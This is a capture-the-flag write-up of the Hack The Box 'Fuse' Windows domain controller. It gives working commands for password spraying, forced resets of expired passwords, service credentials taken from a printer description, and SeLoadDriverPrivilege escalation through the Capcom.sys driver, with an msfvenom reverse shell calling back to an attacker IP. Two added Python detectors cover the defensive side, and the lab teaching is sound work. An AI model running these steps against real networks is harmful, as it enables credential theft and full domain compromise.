Fuse HTB

IP

10.10.10.193

initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.193 | grep '^[0-9]' | cut -d'/' -f1 | tr '\n' ','

results

53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,49677,49678,49679,49702,49708

Let's run a more in-depth scan of the target

sudo nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,49677,49678,49679,49702,49708 -oA tcp_ports 10.10.10.193

results

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-07 23:36:40Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49677/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc        Microsoft Windows RPC
49679/tcp open  msrpc        Microsoft Windows RPC
49702/tcp open  msrpc        Microsoft Windows RPC
49708/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h52m08s, deviation: 4h37m09s, median: 12m07s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-time: 
|   date: 2024-01-07T23:37:32
|_  start_date: 2024-01-07T23:30:39
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2024-01-07T15:37:31-08:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.46 seconds

What we can see:

  • Most likely a domain controller, given the presence of DNS, Kerberos, LDAP, etc.

  • Windows Server 2016

  • Domain name: fabricorp.local; we can add this to our hosts file

  • Host name: FUSE

Let's see if we can perform a zone transfer, since port 53 (DNS) is open

dig @10.10.10.193 fabricorp.local AXFR
  • No luck

Let's test for anonymous authentication on the services

SMB

crackmapexec smb 10.10.10.193 -u anonymous -p ''
  • No luck

LDAP

ldapsearch -x -H ldap://10.10.10.193 -s sub -b "DC=fabricorp,DC=local" "(objectClass=person)"
  • No luck

RPC

rpcclient -N -U anonymous 10.10.10.193
  • No luck

Let's try the web server

When we try to navigate to http://fabricorp.local we are redirected to http://fuse.fabricorp.local/papercut/logs/html/index.htm, so let's add the subdomain fuse to our hosts file as well

When we do and try to access the page again, we can see the following

Looking at the print logs we can see a couple of usernames on the system

pmerton
tlavel
sthompson
bhult
administrator

Other than usernames I can't really find any other pieces of interesting information, and we need a set of working creds to progress, so we can utilise cewl to build a wordlist to use with the usernames we have found

building a wordlist

cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers --depth 4 > pass_lists.txt

Now that we have usernames and a list of possible passwords, let's perform some password spraying via SMB

crackmapexec smb 10.10.10.193 -u usernames.txt -p pass_lists.txt

we do see something interesting

we have

tlavel:Fabricorp01
bhult:Fabricorp01
  • But it looks like the passwords have expired
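From the defender's side, a spray like the one above shows up on the domain controller as a burst of failed logons for many different accounts from one source, and the attempts that fail with STATUS_PASSWORD_MUST_CHANGE are the ones where the guessed password was right. As an added example that is not part of this writeup, the Python below applies that heuristic to constructed Event ID 4625-style records; the sample records and the thresholds are assumptions for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# NTSTATUS codes that appear in the SubStatus field of Event ID 4625 on the DC.
# 0xC0000224 is STATUS_PASSWORD_MUST_CHANGE: the guess was correct but the
# password has expired, which is the result the spray above produced.
STATUS_WRONG_PASSWORD = "0xC000006A"
STATUS_PASSWORD_MUST_CHANGE = "0xC0000224"

# Constructed sample records: (timestamp, target user, source IP, sub-status).
SAMPLE_EVENTS = [
    ("2024-01-07T23:40:01", "pmerton", "10.10.14.22", STATUS_WRONG_PASSWORD),
    ("2024-01-07T23:40:01", "tlavel", "10.10.14.22", STATUS_PASSWORD_MUST_CHANGE),
    ("2024-01-07T23:40:02", "sthompson", "10.10.14.22", STATUS_WRONG_PASSWORD),
    ("2024-01-07T23:40:02", "bhult", "10.10.14.22", STATUS_PASSWORD_MUST_CHANGE),
    ("2024-01-07T23:40:03", "administrator", "10.10.14.22", STATUS_WRONG_PASSWORD),
    # One user mistyping their own password from a workstation is not a spray.
    ("2024-01-07T23:41:10", "dmuir", "10.10.10.50", STATUS_WRONG_PASSWORD),
    ("2024-01-07T23:41:15", "dmuir", "10.10.10.50", STATUS_WRONG_PASSWORD),
]

def detect_spray(events, min_accounts=4, window=timedelta(minutes=5)):
    """Map each source IP that failed against at least min_accounts distinct
    accounts inside one sliding window to the sorted list of those accounts."""
    by_source = defaultdict(list)
    for ts, user, src, status in events:
        by_source[src].append((datetime.fromisoformat(ts), user.lower(), status))
    hits = {}
    for src, rows in by_source.items():
        rows.sort()
        start = 0
        for end in range(len(rows)):
            # Slide the window start forward until rows[start..end] fit in it.
            while rows[end][0] - rows[start][0] > window:
                start += 1
            accounts = {user for _, user, _ in rows[start:end + 1]}
            if len(accounts) >= min_accounts and len(accounts) > len(hits.get(src, ())):
                hits[src] = sorted(accounts)
    return hits

def expired_but_valid(events):
    """Accounts whose failure was STATUS_PASSWORD_MUST_CHANGE: the password was
    right, so these are the accounts that need a forced reset after a spray."""
    return sorted({user for _, user, _, status in events if status == STATUS_PASSWORD_MUST_CHANGE})

if __name__ == "__main__":
    print(detect_spray(SAMPLE_EVENTS))
    print(expired_but_valid(SAMPLE_EVENTS))
```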

We tried to authenticate to a few services, but no luck

If we look back at the image above we can see the message STATUS_PASSWORD_MUST_CHANGE, meaning we do have valid credentials but they have expired. We could try to reset the password using a tool like smbpasswd

impacket-smbpasswd fabricorp/tlavel:Fabricorp01@10.10.10.193 -newpass shrek123!
  • Now we just need to create a password that matches the password complexity policy

shrek123!
  • It seems the password expires 1 minute after creation, so what we can do is write a basic Python script that automates the password change process

import subprocess
import secrets
import string

def gen_password(length=9):
    # Random password from letters, digits and punctuation; secrets is the
    # right module for anything that becomes a real credential
    chars = string.ascii_letters + string.digits + string.punctuation
    return ''.join(secrets.choice(chars) for _ in range(length))

def Grabitall():
    new_password = gen_password()
    # The arguments are passed as a list, so no shell is involved and the
    # password must not be escaped: escaping it would set one value on the
    # account and print a different one
    change_pass = [
        '/usr/bin/impacket-smbpasswd',
        'fabricorp/tlavel:Fabricorp01@10.10.10.193',
        '-newpass',
        new_password
    ]
    try:
        # running the command and capturing both output streams
        result = subprocess.run(change_pass, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
    except OSError as e:
        # the binary could not be started (missing or not executable)
        print(f'the following error has occurred {e}')
        return
    # checking if the command was successful (exit code is zero)
    if result.returncode == 0:
        print(new_password)
    else:
        print('Password change failed')
        print(f'Command output {result.stdout}{result.stderr}')

Grabitall()

Now that we have our automation script, we can continue enumerating

Let's list all the shares

  1. Let's create a new password

./smbpasswd.py

  2. Now let's use crackmapexec to list all the shares

crackmapexec smb 10.10.10.193 -u tlavel -p 'Eo,mer/1F' --shares

  3. For good measure we will also use the spider_plus module and see if we can find anything interesting

crackmapexec smb 10.10.10.193 -u tlavel -p 'Eo,mer/1F' -M spider_plus

Nothing too interesting within SMB, so let's head over to RPC

rpcclient -U fabricorp/tlavel 10.10.10.193

when we enumerate domain users we can see the following

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

Since the web server showed printing information, a good place to start enumerating would be the printers

rpcclient $> enumprinters
        flags:[0x800000]
        name:[\\10.10.10.193\HP-MFT01]
        description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
        comment:[]

Looks like we could have a possible password

scan2docs: $fab@s3Rv1ce$1
  • Looks like creds for the HP-MFT01 SMB share

crackmapexec smb 10.10.10.193 -u scan2docs -p '$fab@s3Rv1ce$1'
  • Doesn't authenticate

Let's perform some password spraying using the recently found usernames

  1. First let's clean them up

sed -n 's/user:\[\(.*\)\] rid:.*/\1/p' usernames > cleaned_usernames.txt

  2. Let's use crackmapexec to perform the password spraying

crackmapexec smb 10.10.10.193 -u cleaned_usernames.txt -p '$fab@s3Rv1ce$1'

and we can see we have some valid creds

svc-print: $fab@s3Rv1ce$1 

Let's list the shares we have access to

crackmapexec smb 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1' --shares

Let's use the spider_plus module and see if we have access to anything interesting

crackmapexec smb 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1' -M spider_plus
  • nothing interesting

Let's see if we can WinRM into the machine

evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'
  • we have a shell on the system

Now that we have a session on the target, let's see if we can enumerate LDAP with bloodhound-python and get some info on the system

bloodhound-python -c all -d fabricorp.local -u svc-print -p '$fab@s3Rv1ce$1' -ns 10.10.10.193
  1. Let's start neo4j

sudo neo4j console

  • login

  2. Start BloodHound

bloodhound --no-sandbox

Now we can ingest all the information we collected with bloodhound-python

  • Don't really find much of interest

If we look at our current privileges on the machine we can see something interesting

  • We can see we have the SeLoadDriverPrivilege enabled for our current user

  • This essentially allows us to load a driver into the kernel

How can we exploit this?

  • Essentially, since we have the SeLoadDriverPrivilege we are able to load a vulnerable driver and then exploit said driver; this post explains this better

we can use the following vulnerable driver

Let's walk through the steps needed to compile, load, and exploit a vulnerable driver using SeLoadDriverPrivilege

  1. We will need to compile a few .exe files for the following attack; the best way to compile .exe files is in a Windows VM. To load the vulnerable driver Capcom.sys we will use the following tool from Tarlogic Security: https://github.com/TarlogicSecurity/EoPLoadDriver/

git clone https://github.com/TarlogicSecurity/EoPLoadDriver.git

After we have downloaded the tool (essentially a single C++ file), let's start a new project in Visual Studio; in the project window we will choose the C++ Console App

  • Note: when creating a new project with the "Console App" template you may run into an error; to fix this, open the Visual Studio Installer

click 'Modify' and install the 'Desktop development with C++' workload

After this is installed we should be able to select the Console App template without error

  2. Alright, back to compiling eoploaddriver.cpp

  • Let's start a new project

click 'Next'

  • In the next window we can specify the name of our new project (you can name it whatever you want)

  • Looking in the project we can see a basic hello world program

  • Now we can replace that code with the contents of eoploaddriver.cpp

After we have copied and pasted the code, we can set the project to 'Release' and 'x64'

then we select 'Build' -> 'Build Solution'

  • Note: we receive an error on the line include "stdafx.h"; we can just remove that line and it will build

Now we should be able to see the .exe file within the specified output path

Now we can transfer this over to our Linux machine

For this I will start a Python HTTP server on my Windows machine

python.exe -m http.server 80

From our Linux machine

wget http://<windows_ip>/EoPLoadDriver.exe

Now we can upload it to the target machine

upload EoPLoadDriver.exe

We also need to upload the Capcom.sys

upload Capcom.sys

Now that we have the vulnerable driver and the loader on the target machine, we can run the same command we saw in the blog post

.\EoPLoadDriver.exe System\CurrentControlSet\dfserv C:\Users\svc-print\Documents\Capcom.sys

we can see the following

  • It looks like it has worked (no error), but we don't have the permissions to check whether the driver is actually running

Next we need to build the actual exploit for our vulnerable driver; we can use the following code

Since this is a .sln file we will need to use Visual Studio on our Windows machine; after we have cloned the repo we can simply double-click the ExploitCapcom.sln file

  1. Let's build the project to see if any errors occur before we modify the code

  • No errors, so we are ready to modify the code slightly. If we look at the LaunchShell function we can see the following

// Launches a command shell process
static bool LaunchShell()
{
    TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
    PROCESS_INFORMATION ProcessInfo;
    STARTUPINFO StartupInfo = { sizeof(StartupInfo) };
    if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE,
        CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo,
        &ProcessInfo))
    {
        return false;
    }

    CloseHandle(ProcessInfo.hThread);
    CloseHandle(ProcessInfo.hProcess);
    return true;
}

  • This just opens a cmd prompt, but since we only have remote access to the machine this is pretty pointless. What we will do is generate a reverse shell with msfvenom and drop that on the system; instead of the function executing cmd.exe we are going to make it execute shrek123.exe, our reverse shell

So we want to change one line in the code

// Launches a command shell process
static bool LaunchShell()
{
    TCHAR CommandLine[] = TEXT("C:\\ProgramData\\shrek123.exe");
    PROCESS_INFORMATION ProcessInfo;
    STARTUPINFO StartupInfo = { sizeof(StartupInfo) };
    if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE,
        CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo,
        &ProcessInfo))
    {
        return false;
    }

    CloseHandle(ProcessInfo.hThread);
    CloseHandle(ProcessInfo.hProcess);
    return true;
}

  • Now we can build the executable, just like we did with the loader

  1. Let's download this onto our Linux host, same as before with a Python HTTP server

  2. Let's generate our reverse shell

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.22 LPORT=9001 -f exe -o shrek123.exe

  3. Let's upload the files and start a listener

upload shrek123.exe
upload ExploitCapcom.exe

  • Start a listener

rlwrap -cAr nc -lvnp 9001

  4. Let's execute the exploit

Note: we may have to run the following again before executing the exploit

.\EoPLoadDriver.exe System\CurrentControlSet\dfserv C:\Users\svc-print\Documents\Capcom.sys

Let's execute the exploit

.\ExploitCapcom.exe

  5. If we check our listener we should have a shell
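Looking at the whole procedure above from the defender's side: the loader works by registering the driver under the user's own registry hive (the System\CurrentControlSet\dfserv path passed to it) and then asking the kernel to load it, and both steps leave traces a sensor can catch. The following Python check is an added example, not part of this writeup or of either tool, run over constructed Sysmon-style registry and driver-load records; the SID, the paths and the field names used in the sample records are assumptions.

```python
import re

# Legitimate driver services are registered under HKLM\SYSTEM\CurrentControlSet\Services.
# A service key that appears under a user hive (HKU\<SID>\System\CurrentControlSet\...)
# is what a SeLoadDriverPrivilege loader creates, because that is where the user can write.
USER_HIVE_SERVICE_KEY = re.compile(
    r"^HKU\\S-1-5-21-[\d-]+\\System\\CurrentControlSet\\[^\\]+\\ImagePath$", re.IGNORECASE)

# Denylist of driver file names. Only the driver named on this page is listed here;
# a real deployment would use a maintained vulnerable-driver blocklist instead.
KNOWN_VULNERABLE_DRIVERS = {"capcom.sys"}

# Constructed Sysmon-style records: Event 13 = registry value set, Event 6 = driver loaded.
# The SID and paths are sample values, not taken from a real host.
SAMPLE_EVENTS = [
    {"EventID": 13, "User": "FABRICORP\\svc-print",
     "TargetObject": "HKU\\S-1-5-21-1111111111-2222222222-3333333333-1104"
                     "\\System\\CurrentControlSet\\dfserv\\ImagePath",
     "Details": "\\??\\C:\\Users\\svc-print\\Documents\\Capcom.sys"},
    {"EventID": 13, "User": "NT AUTHORITY\\SYSTEM",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\Spooler\\ImagePath",
     "Details": "C:\\Windows\\System32\\spoolsv.exe"},
    {"EventID": 6, "ImageLoaded": "C:\\Users\\svc-print\\Documents\\Capcom.sys"},
    {"EventID": 6, "ImageLoaded": "C:\\Windows\\System32\\drivers\\tcpip.sys"},
]

def find_driver_abuse(events):
    """Return one (reason, detail) tuple per record that matches a detection."""
    alerts = []
    for ev in events:
        if ev["EventID"] == 13 and USER_HIVE_SERVICE_KEY.match(ev["TargetObject"]):
            alerts.append(("service ImagePath written under a user hive", ev["TargetObject"]))
        elif ev["EventID"] == 6:
            path = ev["ImageLoaded"]
            if path.rsplit("\\", 1)[-1].lower() in KNOWN_VULNERABLE_DRIVERS:
                alerts.append(("known vulnerable driver loaded", path))
            elif not path.lower().startswith("c:\\windows\\"):
                # Drivers normally live under the Windows directory; a load from a
                # user profile is worth a look even when the file is not denylisted.
                alerts.append(("driver loaded from outside the Windows directory", path))
    return alerts

if __name__ == "__main__":
    for reason, detail in find_driver_abuse(SAMPLE_EVENTS):
        print(f"{reason}: {detail}")
```

The same registry write would also be visible without Sysmon as a Security log registry-audit event, and removing SeLoadDriverPrivilege from accounts that do not need it (it is not granted to ordinary users by default) closes the path entirely.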
